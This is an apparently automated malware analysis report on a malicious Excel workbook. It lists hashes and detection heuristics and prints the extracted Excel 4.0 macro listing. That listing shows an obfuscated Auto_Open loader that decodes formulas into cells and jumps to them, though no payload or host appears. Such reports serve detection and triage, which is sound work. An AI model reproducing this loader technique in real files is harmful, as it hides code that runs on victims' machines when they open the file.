Office (OLE) malware analysis — malicious · f25cae72c9d8ffb3

MALICIOUS

Office (OLE)

36.0 KB Created: 2020-11-25 10:41:10 Authoring application: Microsoft Excel First seen: 2021-02-23

MD5: b85d9d90ba0641f9551b614e95e9d7c6 SHA-1: 08b4946d5659d829d0742864d2b2b4a5104652f1 SHA-256: f25cae72c9d8ffb38fd7ecdc83bcc970c427fec076d27d2f9b2918bdc23d99be

140 Risk Score

Heuristics 3

Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME

oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN

Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN

Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 6419 bytes

Filename	Kind	Source	Size
`xlm_macros.txt`	xlm-macro	oletools.olevba.extract_all_macros (XLM macro listing)	6419 bytes
SHA-256: `982ac21a7a6a5ae9fc788923c891e9fc4e71a3b35a1c2c99ea0ee3912e5da1fa`
Preview script First 1,000 lines of the extracted script ' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 15 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - aAnrra ' 0018 25 LABEL : Cell Value, String Constant - aRfERPPFPz len=0 ' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!B145 ' 0018 20 LABEL : Cell Value, String Constant - bkPGy len=0 ' 0018 23 LABEL : Cell Value, String Constant - DIwVxqMA len=0 ' 0018 20 LABEL : Cell Value, String Constant - gEGPX len=0 ' 0018 24 LABEL : Cell Value, String Constant - hWvmdJWdR len=0 ' 0018 23 LABEL : Cell Value, String Constant - jzVONMWH len=0 ' 0018 25 LABEL : Cell Value, String Constant - KSGrJhSSyO len=0 ' 0018 21 LABEL : Cell Value, String Constant - LoECBX len=0 ' 0018 25 LABEL : Cell Value, String Constant - lqdvzpOPJq len=0 ' 0018 20 LABEL : Cell Value, String Constant - NcIqK len=0 ' 0018 23 LABEL : Cell Value, String Constant - NtPEIajv len=0 ' 0018 26 LABEL : Cell Value, String Constant - nvpMbtlguJr len=0 ' 0018 21 LABEL : Cell Value, String Constant - OkORJF len=0 ' 0018 27 LABEL : Cell Value, String Constant - OXGaeUYxpOhQ len=0 ' 0018 24 LABEL : Cell Value, String Constant - pFInzcGzJ len=0 ' 0018 20 LABEL : Cell Value, String Constant - poSAB len=0 ' 0018 26 LABEL : Cell Value, String Constant - QdEUHRWNXuK len=0 ' 0018 21 LABEL : Cell Value, String Constant - vJJjWz len=0 ' 0018 20 LABEL : Cell Value, String Constant - VPyJd len=0 ' 0018 23 LABEL : Cell Value, String Constant - zQbnflkv len=0 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' Sheet,Reference,Formula,Value ' aAnrra,B47,"SET.NAME("jzVONMWH",VALUE("0"))","" ' aAnrra,B52,"SET.NAME("vJJjWz",jzVONMWH)","" ' aAnrra,B57,"SET.NAME("VPyJd",jzVONMWH)","" ' aAnrra,B60,"SET.NAME("OkORJF",COUNTA(NcIqK))","" ' aAnrra,B65,"SET.NAME("OXGaeUYxpOhQ",COUNTA(poSAB))","" ' aAnrra,B68,[],"" ' aAnrra,B73,"SET.NAME("KSGrJhSSyO","")","" ' aAnrra,B78,"vJJjWz","" ' aAnrra,B83,"SET.NAME("zQbnflkv",HLOOKUP("",NcIqK,vJJjWz,FALSE))","" ' aAnrra,B86,"bkPGy","" ' aAnrra,B91,"SET.NAME("DIwVxqMA",jzVONMWH)","" ' aAnrra,B96,[],"" ' aAnrra,B101,"DIwVxqMA","" ' aAnrra,B106,"QdEUHRWNXuK","" ' aAnrra,B108,"pFInzcGzJ","" ' aAnrra,B110,"LoECBX","" ' aAnrra,B114,"SET.NAME("nvpMbtlguJr",VALUE(HLOOKUP("",poSAB,LoECBX,FALSE)))","" ' aAnrra,B118,"lqdvzpOPJq","" ' aAnrra,B123,"KSGrJhSSyO","" ' aAnrra,B125,"VPyJd","" ' aAnrra,B130,NEXT(),"" ' aAnrra,B132,"aRfERPPFPz","" ' aAnrra,B134,"SET.NAME("f",INT(T(FORMULA(T(KSGrJhSSyO)&"",""&T(aRfERPPFPz)))))","" ' aAnrra,B136,"NtPEIajv","" ' aAnrra,B140,NEXT(),"" ' aAnrra,B143,RETURN(),"" ' aAnrra,B171,"SET.NAME("gEGPX",B47)","" ' aAnrra,B176,"NcIqK","" ' aAnrra,B180,"SET.NAME("poSAB",R63C14)","" ' aAnrra,B185,"SET.NAME("NtPEIajv",194)","" ' aAnrra,B189,"SET.NAME("hWvmdJWdR",2)","" ' aAnrra,B193,gEGPX(),"" ' aAnrra,B194,HALT(),""

SHA-256: 982ac21a7a6a5ae9fc788923c891e9fc4e71a3b35a1c2c99ea0ee3912e5da1fa

Preview script

First 1,000 lines of the extracted script

' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     15 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  aAnrra
' 0018     25 LABEL : Cell Value, String Constant - aRfERPPFPz len=0 
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!B145 
' 0018     20 LABEL : Cell Value, String Constant - bkPGy len=0 
' 0018     23 LABEL : Cell Value, String Constant - DIwVxqMA len=0 
' 0018     20 LABEL : Cell Value, String Constant - gEGPX len=0 
' 0018     24 LABEL : Cell Value, String Constant - hWvmdJWdR len=0 
' 0018     23 LABEL : Cell Value, String Constant - jzVONMWH len=0 
' 0018     25 LABEL : Cell Value, String Constant - KSGrJhSSyO len=0 
' 0018     21 LABEL : Cell Value, String Constant - LoECBX len=0 
' 0018     25 LABEL : Cell Value, String Constant - lqdvzpOPJq len=0 
' 0018     20 LABEL : Cell Value, String Constant - NcIqK len=0 
' 0018     23 LABEL : Cell Value, String Constant - NtPEIajv len=0 
' 0018     26 LABEL : Cell Value, String Constant - nvpMbtlguJr len=0 
' 0018     21 LABEL : Cell Value, String Constant - OkORJF len=0 
' 0018     27 LABEL : Cell Value, String Constant - OXGaeUYxpOhQ len=0 
' 0018     24 LABEL : Cell Value, String Constant - pFInzcGzJ len=0 
' 0018     20 LABEL : Cell Value, String Constant - poSAB len=0 
' 0018     26 LABEL : Cell Value, String Constant - QdEUHRWNXuK len=0 
' 0018     21 LABEL : Cell Value, String Constant - vJJjWz len=0 
' 0018     20 LABEL : Cell Value, String Constant - VPyJd len=0 
' 0018     23 LABEL : Cell Value, String Constant - zQbnflkv len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  aAnrra,B47,"SET.NAME("jzVONMWH",VALUE("0"))",""
'  aAnrra,B52,"SET.NAME("vJJjWz",jzVONMWH)",""
'  aAnrra,B57,"SET.NAME("VPyJd",jzVONMWH)",""
'  aAnrra,B60,"SET.NAME("OkORJF",COUNTA(NcIqK))",""
'  aAnrra,B65,"SET.NAME("OXGaeUYxpOhQ",COUNTA(poSAB))",""
'  aAnrra,B68,[],""
'  aAnrra,B73,"SET.NAME("KSGrJhSSyO","")",""
'  aAnrra,B78,"vJJjWz",""
'  aAnrra,B83,"SET.NAME("zQbnflkv",HLOOKUP("*",NcIqK,vJJjWz,FALSE))",""
'  aAnrra,B86,"bkPGy",""
'  aAnrra,B91,"SET.NAME("DIwVxqMA",jzVONMWH)",""
'  aAnrra,B96,[],""
'  aAnrra,B101,"DIwVxqMA",""
'  aAnrra,B106,"QdEUHRWNXuK",""
'  aAnrra,B108,"pFInzcGzJ",""
'  aAnrra,B110,"LoECBX",""
'  aAnrra,B114,"SET.NAME("nvpMbtlguJr",VALUE(HLOOKUP("*",poSAB,LoECBX,FALSE)))",""
'  aAnrra,B118,"lqdvzpOPJq",""
'  aAnrra,B123,"KSGrJhSSyO",""
'  aAnrra,B125,"VPyJd",""
'  aAnrra,B130,NEXT(),""
'  aAnrra,B132,"aRfERPPFPz",""
'  aAnrra,B134,"SET.NAME("f",INT(T(FORMULA(T(KSGrJhSSyO)&"",""&T(aRfERPPFPz)))))",""
'  aAnrra,B136,"NtPEIajv",""
'  aAnrra,B140,NEXT(),""
'  aAnrra,B143,RETURN(),""
'  aAnrra,B171,"SET.NAME("gEGPX",B47)",""
'  aAnrra,B176,"NcIqK",""
'  aAnrra,B180,"SET.NAME("poSAB",R63C14)",""
'  aAnrra,B185,"SET.NAME("NtPEIajv",194)",""
'  aAnrra,B189,"SET.NAME("hWvmdJWdR",2)",""
'  aAnrra,B193,gEGPX(),""
'  aAnrra,B194,HALT(),""

Open this report in the interactive analyzer, or submit your own file for analysis.